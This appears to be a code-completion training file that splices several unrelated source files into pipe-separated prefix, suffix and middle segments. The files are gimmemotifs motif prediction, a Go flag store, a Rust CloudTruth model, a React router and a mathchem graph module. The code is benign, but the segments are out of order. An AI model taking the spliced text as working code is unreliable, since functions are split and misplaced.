job = args[0]
logger.warn("job %s failed", job)
self.finished.append(job)
except Exception:
logger.warn("job failed")
return
job, (motifs, stdout, stderr) = args
logger.info("%s finished, found %s motifs", job, len(motifs))
for motif in motifs:
if self.do_counter:
self.counter += 1
motif.id = "gimme_{}_".format(self.counter) + motif.id
f = open(self.outfile, "a")
f.write("%s\n" % motif.to_pfm())
f.close()
self.motifs.append(motif)
if self.do_stats and len(motifs) > 0:
# job_id = "%s_%s" % (motif.id, motif.to_consensus())
logger.debug("Starting stats job of %s motifs", len(motifs))
for bg_name, bg_fa in self.background.items():
job = self.job_server.apply_async(
mp_calc_stats,
(
motifs,
self.fg_fa,
bg_fa,
self.zscore,
self.gc,
self.genome,
bg_name,
),
callback=self.add_stats,
)
self.stat_jobs.append(job)
logger.debug("stdout %s: %s", job, stdout)
logger.debug("stdout %s: %s", job, stderr)
self.finished.append(job)
self.lock.release()
def wait_for_stats(self):
"""Make sure all jobs are finished."""
logger.debug("waiting for statistics to finish")
for job in self.stat_jobs:
job.get()
sleep(2)
def add_stats(self, args):
"""Callback to add motif statistics."""
bg_name, stats = args
logger.debug("Stats: %s %s", bg_name, stats)
for motif_id in stats.keys():
if motif_id not in self.stats:
self.stats[motif_id] = {}
self.stats[motif_id][bg_name] = stats[motif_id]
# def submit_remaining_stats(self):
# for motif in self.motifs:
# n = "%s_%s" % (motif.id, motif.to_consensus())
# if n in self.stats:
#
# logger.info("Adding %s again!" % n)
# #job_id = "%s_%s" % (motif.id, motif.to_consensus())
# self.job_server.apply_async(
# _calc_motif_stats,
# (motif, self.fg_fa, self.bg_fa),
# callback=self.add_stats)
#
def pp_predict_motifs(
fastafile,
outfile,
analysis="small",
organism="hg19",
single=False,
background="",
tools=None,
job_server=None,
ncpus=8,
max_time=-1,
stats_fg=None,
stats_bg=None,
gc=True,
):
"""Parallel prediction of motifs.
Utility function for gimmemotifs.denovo.gimme_motifs. It is probably better to
use that instead of calling this function directly.
"""
if tools is None:
tools = {}
config = MotifConfig()
if not tools:
tools = dict([(x, 1) for x in config.get_default_params()["tools"].split(",")])
# logger = logging.getLogger('gimme.prediction.pp_predict_motifs')
wmin = 5
step = 1
if analysis in ["large", "xl"]:
step = 2
wmin = 6
analysis_max = {"xs": 5, "small": 8, "medium": 10, "large": 14, "xl": 20}
wmax = analysis_max[analysis]
if analysis == "xs":
sys.stderr.write("Setting analysis xs to small")
analysis = "small"
if not job_server:
n_cpus = int(config.get_default_params()["ncpus"])
job_server = Pool(processes=n_cpus, maxtasksperchild=1000)
jobs = {}
result = PredictionResult(
outfile,
organism,
fg_file=stats_fg,
background=stats_bg,
gc=gc,
job_server=job_server,
)
# Dynamically load all tools
toolio = [
x[1]()
for x in inspect.getmembers(
tool_classes,
lambda x: inspect.isclass(x)
and issubclass(x, tool_classes.motifprogram.MotifProgram),
)
if x[0] != "MotifProgram"
]
# TODO:
# Add warnings for running time: Weeder, GADEM
# Add all jobs to the job_server
params = {
"analysis": analysis,
"background": background,
"single": single,
"organism": organism,
}
# Tools that don't use a specified width usually take longer
# ie. GADEM, XXmotif, MEME
# Start these first.
for t in [tool for tool in toolio if not tool.use_width]:
if t.name in tools and tools[t.name]:
logger.debug("Starting %s job", t.name)
job_name = t.name
jobs[job_name] = job_server.apply_async(
_run_tool, (job_name, t, fastafile, params), callback=result.add_motifs
)
else:
logger.debug("Skipping %s", t.name)
for t in [tool for tool in toolio if tool.use_width]:
if t.name in tools and tools[t.name]:
for i in range(wmin, wmax + 1, step):
logger.debug("Starting %s job, width %s", t.name, i)
job_name = "%s_width_%s" % (t.name, i)
my_params = params.copy()
my_params["width"] = i
jobs[job_name] = job_server.apply_async(
_run_tool,
(job_name, t, fastafile, my_params),
callback=result.add_motifs,
)
else:
logger.debug("Skipping %s", t.name)
logger.info("all jobs submitted")
for job in jobs.values():
job.get()
result.wait_for_stats()
return result
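# Illustrative sketch (not part of the original module): a minimal driver for
# pp_predict_motifs. All file names below are assumptions for the example.
#
# result = pp_predict_motifs(
# "peaks.fa", # input sequences
# "predicted.pfm", # predicted motifs are appended to this file
# analysis="small",
# organism="hg19",
# tools={"MEME": 1}, # enable a single tool
# stats_fg="peaks.fa",
# stats_bg={"genomic": "bg.fa"},
# )
# print(len(result.motifs))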
def predict_motifs(infile, bgfile, outfile, params=None, stats_fg=None, stats_bg=None):
""" Predict motifs, input is a FASTA-file"""
# Parse parameters
required_params = [
"tools",
"available_tools",
"analysis",
"genome",
"use_strand",
"max_time",
]
if params is None:
params = parse_denovo_params()
else:
for p in required_params:
if p not in params:
params = parse_denovo_params()
break
if "genome" not in params:
logger.error("Need a genome for de novo motif prediction")
# Define all tools
tools = dict(
[
(x.strip(), x in [y.strip() for y in params["tools"].split(",")])
for x in params["available_tools"].split(",")
]
)
# Predict the motifs
analysis = params["analysis"]
logger.info("starting motif prediction (%s)", analysis)
logger.info("tools: %s", ", ".join([x for x in tools.keys() if tools[x]]))
result = pp_predict_motifs(
infile,
outfile,
analysis,
params.get("genome", None),
params["use_strand"],
bgfile,
tools,
None,
# logger=logger,
max_time=params["max_time"],
stats_fg=stats_fg,
stats_bg=stats_bg,
)
motifs = result.motifs
logger.info("predicted %s motifs", len(motifs))
logger.debug("written to %s", outfile)
if len(motifs) == 0:
logger.info("no motifs found")
result.motifs = []
return result | fg_file=fg_fa, |
kflag.go | package kli
import (
"reflect"
"time"
)
type KFlag interface {
// Store returns a map of the registered flag names to their reflect.Kind
Store() map[string]reflect.Kind
// SetFlag registers a new flag under the given name
SetFlag(name string, ptr interface{})
// BoolFlag returns the value of the flag "name";
// ok is false if the flag does not exist or is of the wrong type
BoolFlag(name string) (value, ok bool)
// DurationFlag returns the value of the flag "name";
// ok is false if the flag does not exist or is of the wrong type
DurationFlag(name string) (value time.Duration, ok bool)
// Float64Flag returns the value of the flag "name";
// ok is false if the flag does not exist or is of the wrong type
Float64Flag(name string) (value float64, ok bool)
// IntFlag returns the value of the flag "name";
// ok is false if the flag does not exist or is of the wrong type
IntFlag(name string) (value int, ok bool)
// Int64Flag returns the value of the flag "name";
// ok is false if the flag does not exist or is of the wrong type
Int64Flag(name string) (value int64, ok bool)
// StringFlag returns the value of the flag "name";
// ok is false if the flag does not exist or is of the wrong type
StringFlag(name string) (value string, ok bool)
// UintFlag returns the value of the flag "name";
// ok is false if the flag does not exist or is of the wrong type
UintFlag(name string) (value uint, ok bool)
// Uint64Flag returns the value of the flag "name";
// ok is false if the flag does not exist or is of the wrong type
Uint64Flag(name string) (value uint64, ok bool)
}
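// exampleUsage is an illustrative sketch, not part of the original package:
// callers register pointers with SetFlag and read them back through the
// typed accessors. Note the design choice visible in DurationFlag below:
// durations are stored behind a *string and parsed with time.ParseDuration
// on each access, so the stored kind is reflect.String, not a Duration.
func exampleUsage() {
fs := NewKflag()
verbose := true
timeout := "1m30s"
fs.SetFlag("verbose", &verbose)
fs.SetFlag("timeout", &timeout)
if v, ok := fs.BoolFlag("verbose"); ok {
_ = v // true
}
if d, ok := fs.DurationFlag("timeout"); ok {
_ = d // 90 seconds as a time.Duration
}
}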
type FlagStore struct {
f map[string]interface{}
}
func NewKflag() *FlagStore |
func (a *FlagStore) Store() map[string]reflect.Kind {
result := make(map[string]reflect.Kind)
for name, f := range a.f {
result[name] = reflect.TypeOf(f).Elem().Kind()
}
return result
}
func (a *FlagStore) SetFlag(name string, ptr interface{}) {
a.f[name] = ptr
}
// flagElem returns the FlagStore for the given name
func (a *FlagStore) flagElem(name string) reflect.Value {
if f, ok := a.f[name]; ok {
e := reflect.ValueOf(f).Elem()
return e
}
return reflect.Value{}
}
func (a *FlagStore) BoolFlag(name string) (value, ok bool) {
f := a.flagElem(name)
if f.Kind() != reflect.Bool {
return
}
return f.Bool(), true
}
func (a *FlagStore) DurationFlag(name string) (value time.Duration, ok bool) {
f := a.flagElem(name)
if f.Kind() != reflect.String {
return
}
d, e := time.ParseDuration(f.String())
if e != nil {
return
}
return d, true
}
func (a *FlagStore) Float64Flag(name string) (value float64, ok bool) {
f := a.flagElem(name)
if f.Kind() != reflect.Float64 {
return
}
return f.Float(), true
}
func (a *FlagStore) IntFlag(name string) (value int, ok bool) {
f := a.flagElem(name)
if f.Kind() != reflect.Int {
return
}
return int(f.Int()), true
}
func (a *FlagStore) Int64Flag(name string) (value int64, ok bool) {
f := a.flagElem(name)
if f.Kind() != reflect.Int64 {
return
}
return f.Int(), true
}
func (a *FlagStore) StringFlag(name string) (value string, ok bool) {
f := a.flagElem(name)
if f.Kind() != reflect.String {
return
}
return f.String(), true
}
func (a *FlagStore) UintFlag(name string) (value uint, ok bool) {
f := a.flagElem(name)
if f.Kind() != reflect.Uint {
return
}
return uint(f.Uint()), true
}
func (a *FlagStore) Uint64Flag(name string) (value uint64, ok bool) {
f := a.flagElem(name)
if f.Kind() != reflect.Uint64 {
return
}
return f.Uint(), true
}
| {
return &FlagStore{map[string]interface{}{}}
} |
aws_integration_create.rs | /*
* CloudTruth Management API
*
* CloudTruth centralizes your configuration parameters and secrets making them easier to manage and use as a team.
*
* The version of the OpenAPI document: 1.0.0
* Contact: [email protected]
* Generated by: https://openapi-generator.tech
*/
#[derive(Clone, Debug, PartialEq, Serialize, Deserialize)]
pub struct | {
/// An optional description for the integration.
#[serde(rename = "description", skip_serializing_if = "Option::is_none")]
pub description: Option<String>,
/// Allow actions to write to the integration.
#[serde(rename = "writable", skip_serializing_if = "Option::is_none")]
pub writable: Option<bool>,
/// The AWS Account ID.
#[serde(rename = "aws_account_id")]
pub aws_account_id: String,
/// The AWS regions to integrate with.
#[serde(rename = "aws_enabled_regions")]
pub aws_enabled_regions: Vec<crate::models::AwsRegionEnum>,
/// The AWS services to integrate with.
#[serde(rename = "aws_enabled_services")]
pub aws_enabled_services: Vec<crate::models::AwsServiceEnum>,
/// This is a shared secret between the AWS Administrator who set up your IAM trust relationship and your CloudTruth AWS Integration. If your AWS Administrator provided you with a value use it, otherwise we will generate a random value for you to give to your AWS Administrator.
#[serde(rename = "aws_external_id", skip_serializing_if = "Option::is_none")]
pub aws_external_id: Option<String>,
/// The role that CloudTruth will assume when interacting with your AWS Account through this integration. The role is configured by your AWS Account Administrator. If your AWS Administrator provided you with a value use it, otherwise make your own role name and give it to your AWS Administrator.
#[serde(rename = "aws_role_name")]
pub aws_role_name: String,
}
impl AwsIntegrationCreate {
pub fn new(
aws_account_id: String,
aws_enabled_regions: Vec<crate::models::AwsRegionEnum>,
aws_enabled_services: Vec<crate::models::AwsServiceEnum>,
aws_role_name: String,
) -> AwsIntegrationCreate {
AwsIntegrationCreate {
description: None,
writable: None,
aws_account_id,
aws_enabled_regions,
aws_enabled_services,
aws_external_id: None,
aws_role_name,
}
}
}
| AwsIntegrationCreate |
App.js | import React, {Component} from 'react';
import {HashRouter, Redirect, Route, Switch} from 'react-router-dom';
import {FormattedMessage, IntlProvider} from 'react-intl';
import AppLocale from './lang/index';
import {connect} from "react-redux";
import {getLoginObject} from "./redux/auth/actions";
// import { renderRoutes } from 'react-router-config';
const loading = () =>
<div className="animated fadeIn pt-3 text-center">
<FormattedMessage id="global.label.loading..."/>
</div>;
// Containers
const DefaultLayout = React.lazy(() => import('./containers/DefaultLayout'));
// Pages
const Login = React.lazy(() => import('./views/Pages/Login'));
const Register = React.lazy(() => import('./views/Pages/Register'));
const Page404 = React.lazy(() => import('./views/Pages/Page404'));
const Page500 = React.lazy(() => import('./views/Pages/Page500'));
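// Route guard (explanatory comment, not in the original file): InitialPath
// renders the protected component only when a login object exists, otherwise
// it redirects to /login, preserving the attempted location in state so it
// can be restored after a successful login.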
const InitialPath = ({component: Component, authUser, ...rest}) =>
<Route
{...rest}
render={props =>
authUser
? <Component {...props}/>
: <Redirect
to={{
pathname: '/login',
state: {from: props.location}
}}
/>}
/>;
class App extends Component {
// static async getIt() {
// if (localStorage.getItem('LoginObject')) {
// return localStorage.getItem('LoginObject');
// } else
// return null
// }
render() {
// We have to get it from redux ... as it is ...
// const {location, match, user, locale} = this.props;
const {locale} = this.props;
// const { location, match, user, locale } = this.props;
const currentAppLocale = AppLocale[locale];
if (locale === 'fa') {
document.documentElement.dir = 'rtl';
} else {
document.documentElement.dir = 'ltr';
}
// const currentAppLocale = AppLocale['fa'];
// if (location.pathname === '/' || location.pathname === '/app' || location.pathname === '/app/') {
// return (<Redirect to={defaultStartPath} />);
// }
// let user = App.getIt();
if (!this.props.loginObj)
this.props.getLoginObject();
//
//
//
// console.log("user >> ");
// console.log(user); | <IntlProvider
locale={currentAppLocale.locale}
messages={currentAppLocale.messages}>
<React.Suspense fallback={loading()}>
<Switch>
<Route exact path="/login" name="Login Page" render={props => <Login {...props}/>}/>
<Route exact path="/register" name="Register Page" render={props => <Register {...props}/>}/>
<Route exact path="/404" name="Page 404" render={props => <Page404 {...props}/>}/>
<Route exact path="/500" name="Page 500" render={props => <Page500 {...props}/>}/>
<InitialPath
path={`/`}
authUser={this.props.loginObj}
// authUser={user}
component={DefaultLayout}
/>
{/*<Route path="/" name="Home" render={props => <DefaultLayout {...props}/>}/>*/}
</Switch>
</React.Suspense>
</IntlProvider>
</HashRouter>
);
}
}
const mapStateToProps = ({settings, authUser}) => {
const {locale} = settings;
const {loginObj} = authUser;
return {locale, loginObj};
};
export default connect(mapStateToProps, {getLoginObject})(App); |
return (
<HashRouter> |
mathchem.py | import numpy as np
class Mol():
r"""
Molecule.
"""
__g6_string = ''
# Adjacency matrix
__A = []
# Incidence matrix
__B = []
# Laplacian matrix
__L = []
# Normalized laplacian matrix
__NL = []
# Signless laplacian matrix
__Q = []
# Distance matrix
__D = []
# Resistance Distance matrix
__RD = []
__Order = 0
__Edges = []
__Sage_graph = None
__NX_graph = None
__Degrees = []
__Spectrum = []
__Laplacian_spectrum = []
__Distance_spectrum = []
__Norm_laplacian_spectrum = []
__Signless_laplacian_spectrum = []
__RD_spectrum = []
__Is_connected = None
# Switch it to False when we know that the graph is connected. Useful for big calculations
__Check_connectedness = True
def _reset_(self):
""" Reset all attributes """
self.__g6_string = ''
# Adjacency matrix
self.__A = []
# Incidence matrix
self.__B = []
# Laplacian matrix
self.__L = []
# Normalized laplacian matrix
self.__NL = []
# Signless laplacian matrix
self.__Q = []
# Distance matrix
self.__D = []
# Resistance Distance matrix
self.__RD = []
self.__Order = 0
self.__Edges = []
self.__Sage_graph = None
self.__NX_graph = None
self.__Degrees = []
self.__Spectrum = []
self.__Laplacian_spectrum = []
self.__Distance_spectrum = []
self.__Norm_laplacian_spectrum = []
self.__Signless_laplacian_spectrum = []
self.__RD_spectrum = []
self.__Is_connected = None
# allow setting the structure from outside
# used in utilities
def _set_A(self, A):
self.__A = A
def _set_Edges(self, edges):
self.__Edges = edges
def _set_Order(self, order):
self.__Order = order
# native method to initialize Mol class is to provide g6 string
def __init__(self, string=None, check_connectedness=True):
""" Molecular graph class """
self.__Check_connectedness = check_connectedness
if string is not None:
if string[0] == '>':
if string.startswith('>>graph6<<'):
string = string[10:]
elif string.startswith('>>sparse6<<'):
string = string[11:]
if string[0] == ':':
self.read_s6(string)
else:
self.read_g6(string)
def __repr__(self):
if self.__A is not None:
return 'Molecular graph on ' + str(
self.__Order) + ' vertices and ' + str(self.size()) + ' edges'
return 'Empty Molecular graph'
def __len__(self):
if self.__A is not None: return len(self.__A)
else: return 0
def set_check_connectedness(self, c):
""" Switch on/off checking of connectedness for the graph. Can save time in batch calculations.
args: c (True/False)
"""
self.__Check_connectedness = c
def g6_string(self):
""" Return a graph6 string representation of the graph
Alias: graph6_string """
return self.__g6_string
# alias like in Sage:
graph6_string = g6_string
def order(self):
""" Return number of vertices """
return self.__Order
# alias for order
n = order
def edges(self):
""" Return list of edges """
return self.__Edges
def size(self):
""" Return number of edges"""
return len(self.__Edges)
# alias for size
m = size
def vertices(self):
""" Return list of vertices """
return range(self.__Order)
def sage_graph(self):
""" Return Sage Graph object """
if self.__Sage_graph is None: self._init_sage_graph_()
return self.__Sage_graph
def NX_graph(self):
""" Return NetworkX graph object """
if self.__NX_graph is None:
import networkx as nx
self.__NX_graph = nx.Graph(self.__Edges)
return self.__NX_graph
nx_graph = NX_graph
def _init_sage_graph_(self):
""" Initialize SAGE graph from Adjacency matrix"""
from sage.graphs.graph import Graph
self.__Sage_graph = Graph(self.__Edges)
def read_g6(self, s):
""" Initialize graph from graph6 string """
def graph_bit(pos, off):
return ((ord(s[off + 1 + pos // 6]) - 63) & (2**(5 - pos % 6))) != 0
if s.startswith('>>graph6<<'):
s = s[10:]
# reset all the attributes before changing the structure
self._reset_()
n = ord(s[0]) - 63
off = 0
if n == 63:
if ord(s[1]) - 63 != 63:
n = ((ord(s[1]) - 63) << 12) + (
(ord(s[2]) - 63) << 6) + ord(s[3]) - 63
off = 3
else:
n = ((ord(s[2]) - 63) << 30) + ((ord(s[3]) - 63) << 24) + (
(ord(s[4]) - 63) << 18) + ((ord(s[5]) - 63) << 12) + (
(ord(s[6]) - 63) << 6) + ord(s[7]) - 63
off = 7
self.__Order = n
self.__A = [[0 for col in range(n)] for row in range(n)]
i = 0
j = 1
self.__Edges = []
for x in range(n * (n - 1) // 2):
if graph_bit(x, off):
self.__A[i][j] = 1
self.__A[j][i] = 1
self.__Edges.append((i, j))
if j - i == 1:
i = 0
j += 1
else:
i += 1
self.__g6_string = s
read_graph6 = read_g6
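# Illustrative sketch (comment only, not part of the original class): in
# graph6, for n < 63 the first byte is chr(n + 63) and the upper triangle of
# the adjacency matrix follows, packed 6 bits per byte with each byte offset
# by 63. The complete graph K4 is therefore "C~": chr(4 + 63) == 'C', and its
# six edge bits 111111 -> 63 -> chr(63 + 63) == '~'. So:
#
# m = Mol("C~")
# m.order() # -> 4
# m.size() # -> 6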
def read_s6(self, s):
""" Initialize graph from sparse6 string """
def graph_bit(pos, off):
return ((ord(s[off + 1 + pos // 6]) - 63) & (2**(5 - pos % 6))) != 0
if s.startswith('>>sparse6<<'):
s = s[11:]
if not s[0] == ':':
print('This is not a sparse6 format!')
return False
# reset all the attributes before changing the structure
self._reset_()
s = s[1:]
n = ord(s[0]) - 63
off = 0
if n == 63:
if ord(s[1]) - 63 != 63:
n = ((ord(s[1]) - 63) << 12) + (
(ord(s[2]) - 63) << 6) + ord(s[3]) - 63
off = 3
else:
n = ((ord(s[2]) - 63) << 30) + ((ord(s[3]) - 63) << 24) + (
(ord(s[4]) - 63) << 18) + ((ord(s[5]) - 63) << 12) + (
(ord(s[6]) - 63) << 6) + ord(s[7]) - 63
off = 7
self.__Order = n
k = 1
while 1 << k < n:
k += 1
data = s[off + 1:]
#print n,k
#print data
def parseData():
"""Return stream of pairs b[i], x[i] for sparse6 format."""
chunks = iter(data)
d = None # partial data word
dLen = 0 # how many unparsed bits are left in d
while 1:
if dLen < 1:
d = ord(next(chunks)) - 63
dLen = 6
dLen -= 1
b = (d >> dLen) & 1 # grab top remaining bit
x = d & ((1 << dLen) - 1) # partially built up value of x
xLen = dLen # how many bits included so far in x
while xLen < k: # now grab full chunks until we have enough
d = ord(next(chunks)) - 63
dLen = 6
x = (x << 6) + d
xLen += 6
x = (x >> (xLen - k)) # shift back the extra bits
dLen = xLen - k
yield b, x
self.__A = [[0 for col in range(n)] for row in range(n)]
self.__Edges = []
v = 0
for b, x in parseData():
if b: v += 1
if x >= n:
break # padding with ones can cause overlarge number here
elif x > v:
v = x
else:
self.__A[x][v] = 1
self.__A[v][x] = 1
self.__Edges.append((x, v))
self.__g6_string = ''
read_sparse6 = read_s6
def read_matrix(self, matrix):
"""Initialize graph from adjacency matrix including numpy.matrix"""
if type(matrix) == np.matrix:
matrix = matrix.astype(int).tolist()
self._reset_()
self.__Order = len(matrix)
self.__A = matrix
for i in range(self.__Order):
for j in range(i):
if matrix[i][j] == 1:
self.__Edges.append((i, j))
def read_edgelist(self, edges):
"""Initialize graph from list of edges.
Example:
m = mathchem.Mol()
m.read_edgelist( [(4,3),(3,1),(1,4)] )"""
# first relabel nodes
nodes = []
for e in edges:
if not e[0] in nodes: nodes.append(e[0])
if not e[1] in nodes: nodes.append(e[1])
self._reset_()
self.__Order = len(nodes)
d = dict(zip(nodes, range(len(nodes))))
self.__Edges = [(d[e[0]], d[e[1]]) for e in edges]
self.__A = [[0 for col in range(self.__Order)]
for row in range(self.__Order)]
for i, j in self.__Edges:
self.__A[i][j] = 1
self.__A[j][i] = 1
def write_dot_file(self, filename):
f_out = open(filename, 'w')
f_out.writelines('graph Mol {\n')
for (i, j) in self.edges():
f_out.writelines(' ' + str(i) + ' -- ' + str(j) + ';\n')
f_out.writelines('}')
f_out.close()
#
#
# matrices
#
#
def adjacency_matrix(self):
""" Return Adjacency matrix
Alias : A
"""
return self.__A
A = adjacency_matrix
def incidence_matrix(self):
""" Return Incidence matrix
Alias: B
"""
if self.__B == []:
def func(u, v):
col = [0] * self.__Order
col[u] = 1
col[v] = 1
return col
# apply func to each edge
b = [func(u, v) for (u, v) in self.edges()]
# transpose the result
self.__B = [list(col) for col in zip(*b)]
return self.__B
B = incidence_matrix
def laplacian_matrix(self):
""" Return Laplacian matrix
L = D-A
where D - matrix whose diagonal elements are the degrees of the corresponding vertices
A - adjacency matrix
Alias : L
"""
if self.__L == []:
self.__L = np.diag(self.degrees()) - np.matrix(self.__A)
return self.__L
L = laplacian_matrix
def signless_laplacian_matrix(self):
""" Return Signless Laplacian matrix
Q = D+A
Alias : Q
"""
if self.__Q == []:
self.__Q = np.diag(self.degrees()) + np.matrix(self.__A)
return self.__Q
Q = signless_laplacian_matrix
def normalized_laplacian_matrix(self):
""" Return Normalized Laplacian matrix
NL = deg^(-1/2) * L * deg^(-1/2)
Alias : NL
"""
## TODO: check if we have zeros in degrees()
if self.__NL == []:
d = np.diag(np.power(self.degrees(), -.5))
self.__NL = d * self.laplacian_matrix() * d
return self.__NL
NL = normalized_laplacian_matrix
def distance_matrix(self):
""" Return Distance matrix
Alias : D
"""
if self.__Order == 0: return []
if self.__D == []:
# use here float only for using np.inf - infinity
A = np.matrix(self.__A, dtype=float)
n, m = A.shape
I = np.identity(n)
A[A == 0] = np.inf # set zero entries to inf
A[I == 1] = 0 # except diagonal which should be zero
for i in range(n):
r = A[i, :]
A = np.minimum(A, r + r.T)
self.__D = np.matrix(A, dtype=int)
return self.__D
D = distance_matrix
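# Worked example for the min-plus relaxation above (comment only): each pass
# relaxes all shortest paths through vertex i via A = minimum(A, r + r.T), a
# vectorized Floyd-Warshall step. For the path 0-1-2 this turns
# A = [[0,1,inf],[1,0,1],[inf,1,0]] into D = [[0,1,2],[1,0,1],[2,1,0]].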
def reciprocal_distance_matrix(self):
""" Return Reciprocal Distance matrix """
rd = np.matrix(self.distance_matrix(), dtype=float)
# there is probably a more pythonic way to apply a function to each element of a matrix
for i in range(self.__Order):
for j in range(self.__Order):
if not rd[i, j] == 0: rd[i, j] = 1 / rd[i, j]
return rd
def resistance_distance_matrix(self):
""" Return Resistance Distance matrix """
if not self.is_connected() or self.__Order == 0:
return False
if self.__RD == []:
#from numpy import linalg as la
n = self.__Order
s = n * self.laplacian_matrix() + 1
sn = n * np.linalg.inv(s)
RD = np.ndarray((n, n))
for i in range(n):
for j in range(n):
RD[i, j] = np.float64(
np.longdouble(sn[i, i]) + np.longdouble(sn[j, j]) -
2 * np.longdouble(sn[i, j]))
self.__RD = RD
return self.__RD
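# Sanity check for the formula above (comment only): RD[i,j] is computed as
# S[i,i] + S[j,j] - 2*S[i,j] with S = n * inv(n*L + J), which agrees with the
# usual pseudo-inverse formulation. For K2 (a single edge):
# L = [[1,-1],[-1,1]], S = [[0.75,0.25],[0.25,0.75]], so
# RD[0,1] = 0.75 + 0.75 - 0.5 = 1 (one unit resistor) and RD[0,0] = 0.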
def seidel_matrix(self):
""" Return Seidel matrix
S = J - I - 2A
Alias: S
"""
n = self.__Order
return np.ones((n, n)) - np.identity(n) - 2 * np.matrix(self.__A)
S = seidel_matrix
#
#
# Graph invariants
#
#
def diameter(self):
""" Return diameter of the graph
Diameter is the maximum value of distance matrix
"""
if self.__Order == 0: return 0
return self.distance_matrix().max()
def degrees(self):
""" Return degree of the vertex
Alias : deg
"""
if self.__Degrees == []:
# calculate degrees for all vertices once and cache the list
self.__Degrees = [sum(row) for row in self.__A]
return self.__Degrees
deg = degrees
def eccentricity(self):
""" Eccentricity of the graph for all its vertices"""
if self.__Order == 0: return None
return self.distance_matrix().max(axis=0).tolist()[0]
def distances_from_vertex(self, v):
""" Return list of all distances from a given vertex to all others"""
# also used to test whether the graph is connected or not
seen = {}
level = 0
nextlevel = [v]
while nextlevel:
thislevel = nextlevel
nextlevel = []
for v in thislevel:
if v not in seen:
seen[v] = level
nb = [
i
for (i, j) in zip(range(len(self.__A[v])), self.__A[v])
if j != 0
]
nextlevel.extend(nb)
#if (cutoff is not None and cutoff <= level): break
level = level + 1
return seen
def is_connected(self):
""" Return True/False depends on the graph is connected or not """
if self.__Order == 0: return False
if not self.__Check_connectedness: return True | if self.__Is_connected is None:
# we take vertex 0 and check whether we can reach all other vertices
self.__Is_connected = len(
self.distances_from_vertex(0)) == self.order()
return self.__Is_connected
#
#
# Graph spectra
#
#
def spectrum(self, matrix="adjacency"):
r""" Spectrum of the graph
args:
matrix (str or matrix)
'adjacency' or 'A' : default
'laplacian' or 'L'
'distance' or 'D'
'signless_laplacian' or 'Q'
'normalized_laplacian' or 'NL'
'resistance_distance' or 'RD'
'reciprocal_distance'
arbitrary matrix
"""
from numpy import linalg as la
if type(matrix) is str:
if self.__Order == 0: return []
if matrix == "adjacency" or matrix == "A":
if self.__Spectrum == []:
s = la.eigvalsh(self.__A).tolist()
s.sort(reverse=True)
self.__Spectrum = s
return self.__Spectrum
elif matrix == "laplacian" or matrix == "L":
if self.__Laplacian_spectrum == []:
s = la.eigvalsh(self.laplacian_matrix()).tolist()
s.sort(reverse=True)
self.__Laplacian_spectrum = [x if x > 0 else 0 for x in s]
return self.__Laplacian_spectrum
elif matrix == "distance" or matrix == "D":
if self.__Distance_spectrum == []:
s = la.eigvalsh(self.distance_matrix()).tolist()
s.sort(reverse=True)
self.__Distance_spectrum = s
return self.__Distance_spectrum
elif matrix == "signless_laplacian" or matrix == "Q":
if self.__Signless_laplacian_spectrum == []:
## TODO: check if we have zeros in degrees()
s = la.eigvalsh(self.signless_laplacian_matrix()).tolist()
s.sort(reverse=True)
self.__Signless_laplacian_spectrum = [x if x > 0 else 0 for x in s]
return self.__Signless_laplacian_spectrum
elif matrix == "normalized_laplacian" or matrix == "NL":
if self.__Norm_laplacian_spectrum == []:
## TODO: check if we have zeros in degrees()
s = la.eigvalsh(
self.normalized_laplacian_matrix()).tolist()
s.sort(reverse=True)
self.__Norm_laplacian_spectrum = s
return self.__Norm_laplacian_spectrum
elif matrix == "resistance_distance" or matrix == "RD":
if self.__RD_spectrum == []:
s = la.eigvalsh(self.resistance_distance_matrix()).tolist()
s.sort(reverse=True)
self.__RD_spectrum = s
return self.__RD_spectrum
# NO CACHE
elif matrix == "reciprocal_distance":
s = la.eigvalsh(self.reciprocal_distance_matrix()).tolist()
s.sort(reverse=True)
return s
else:
return False
# if the parameter is an arbitrary matrix
# DEPRECATED:
# use mathchem.spectrum(matrix) for arbitrary matrices
#
else:
s = la.eigvalsh(matrix).tolist()
s.sort(reverse=True)
return s
# for arbitrary matrices use:
# mathchem.spectral_moment(matrix)
def spectral_moment(self, k, matrix="adjacency"):
""" Return k-th spectral moment
parameters: matrix - see spectrum help
"""
return np.sum(np.power(self.spectrum(matrix), k))
# for arbitrary matrices use:
# mathchem.spectral_radius(matrix)
def spectral_radius(self, matrix="adjacency"):
s = self.spectrum(matrix)
return max(abs(s[0]), abs(s[len(s) - 1]))
# for arbitrary matrices use:
# mathchem.energy(matrix)
def energy(self, matrix="adjacency"):
""" Return energy of the graph
parameters: matrix - see spectrum help
"""
if self.__Order == 0: return False
s = self.spectrum(matrix)
a = np.sum(s, dtype=np.longdouble) / len(s)
return np.float64(
np.sum([abs(x - a) for x in s], dtype=np.longdouble))
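# Note (comment only): because the sum subtracts the spectral mean a, this is
# the energy as "deviation from the average eigenvalue". For the adjacency
# matrix the mean is 0 (trace(A) = 0 for simple graphs), so it reduces to the
# classical graph energy sum(|lambda_i|); e.g. K2 has spectrum [1, -1] and
# energy 2.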
def incidence_energy(self):
""" Return incidence energy (IE)
Incidence energy is the sum of singular values of incidence matrix
"""
if self.__Order == 0: return False
from numpy.linalg import svd
return np.float64(
np.sum(svd(self.incidence_matrix(), compute_uv=False),
dtype=np.longdouble))
#
#
# Chemical indices
#
#
def zagreb_m1_index(self):
""" Zagreb M1 Index """
return sum(map(lambda d: d**2, self.degrees()))
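# Example (comment only): M1 sums squared degrees, so for the path graph P3
# (degrees [1, 2, 1]) zagreb_m1_index() returns 1 + 4 + 1 = 6.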
def zagreb_m2_index(self):
""" Zagreb M2 Index
The molecular graph must contain at least one edge, otherwise the function returns False
Zagreb M2 Index is a special case of Connectivity Index with power = 1"""
return sum(self.degrees()[u] * self.degrees()[v]
for (u, v) in self.edges())
def zagreb_m1_coindex(self):
""" Zagreb M1 Coindex """
return 2 * self.size() * (self.__Order - 1) - self.zagreb_m1_index()
def zagreb_m2_coindex(self):
""" Zagreb M2 Coindex """
return 2 * (self.size()**
2) - self.zagreb_m2_index() - self.zagreb_m1_index() * .5
def connectivity_index(self, power):
""" Connectivity index (R)"""
E = self.edges() # E - all edges
if len(E) == 0: return 0
return np.float64(
np.sum([(self.degrees()[u] * self.degrees()[v])**power
for (u, v) in E],
dtype=np.longdouble))
def augmented_zagreb_index(self):
""" Augmented Zagreb Index"""
E = self.edges() # E - all edges
d = self.degrees()
if len(E) < 2: return 0
return np.float64(
np.sum([(np.longdouble(d[u] * d[v]) /
(d[u] + d[v] - 2))**3 for (u, v) in E],
dtype=np.longdouble))
